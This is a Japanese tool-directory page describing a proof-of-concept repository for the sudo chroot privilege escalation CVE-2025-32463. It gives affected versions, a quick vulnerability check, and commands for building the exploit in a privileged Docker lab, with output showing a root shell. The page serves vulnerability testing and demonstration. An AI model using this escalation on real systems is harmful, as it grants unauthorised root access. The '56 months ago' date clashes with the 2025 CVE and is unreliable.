Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2025-32463 — chwoot PoCのC再実装 | Kitploit
ツール/GitHubGitHub/vpr-labs/cve-2025-32463
特権昇格脆弱性分析エクスプロイトペネトレーションテストコンテナエスケープバイナリエクスプロイト
GitHubvpr-labs/cve-2025-32463

CVE-2025-32463

chwoot PoCのC再実装

リポジトリを見る
56ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

大きく影響を受け、コピーされ、pr0v3rbs による類似リポジトリの形式に基づいています -- https://github.com/pr0v3rbs/CVE-2025-32463i\_chwoot.git これは、迅速な単一ソース配信、実行、およびクリーンアップのためのC再実装です。

CVE-2025-32463 – sudo chroot ("chwoot") PoC

このリポジトリは、sudo の chroot 機能における CVE‑2025‑32463 特権昇格の脆弱性を実証するための最小限の再現環境を提供します。

  • この脆弱性は Rich Mirch (@0xm1rch on X) 氏によって Stratascale に報告されました。
  • 元の記事: Vulnerability Advisory: Sudo chroot Elevation of Privilege
  • NVD: CVE-2025-32463 (CVSS 9.3)

影響を受けるバージョン

ほとんどのLinuxディストリビューションにおいて、sudo 1.9.14 から 1.9.17(すべてのp‑リビジョン)までの脆弱なビルドが影響を受けます。

セキュリティページ

  • Ubuntu (CVSS 9.3)
  • Redhat (CVSS 7.8)
  • SUSE (CVSS 7.8)
  • Debian

内容

ファイル目的
Dockerfile脆弱な sudo 1.9.16p2 とビルドツールを含む Ubuntu 24.04 イメージを構築します
sudo‑chwoot.shchroot 内で root シェルを起動する概念実証エクスプロイト
run.shイメージを(必要に応じて)ビルドし、エクスプロイトコンテナを起動するヘルパースクリプト

クイック脆弱性チェック

root@kitploit:~
# 脆弱な sudo
poc ~ $ sudo -R woot woot
sudo: woot: No such file or directory

# パッチ適用済みの sudo
poc ~ $ sudo -R woot woot
[sudo] password for poc:
sudo: you are not permitted to use the -R option with woot

Docker コンテナでエクスプロイトをテスト

root@kitploit:~
# 1 – リポジトリをクローン
$ git clone https://github.com/vpr-labs/CVE-2025-32463.git
$ cd CVE-2025-32463

# 2 – Docker イメージをビルドして実行(タグ "vpr-chwoot" で)
$ ./run.sh

# 3 – コンテナ内でエクスプロイトを実行(root コマンドを直接実行)
poc@f722d9182d1f:~$ make && ./vpr-chwoot
woot!
root@f722d9182d1f:/# id
uid=0(root) gid=0(root) groups=0(root),1001(poc)
root@f722d9182d1f:/#

run.sh は --privileged と --rm を Docker に渡すため、終了時にコンテナは自動的にクリーンアップされます。


クリーンアップ

完了したらイメージを削除します:

root@kitploit:~
docker rmi vpr-chwoot

参考

  • Stratascale CRU 脆弱性ノート: Vulnerability Advisory: Sudo chroot Elevation of Privilege
ツールをダウンロード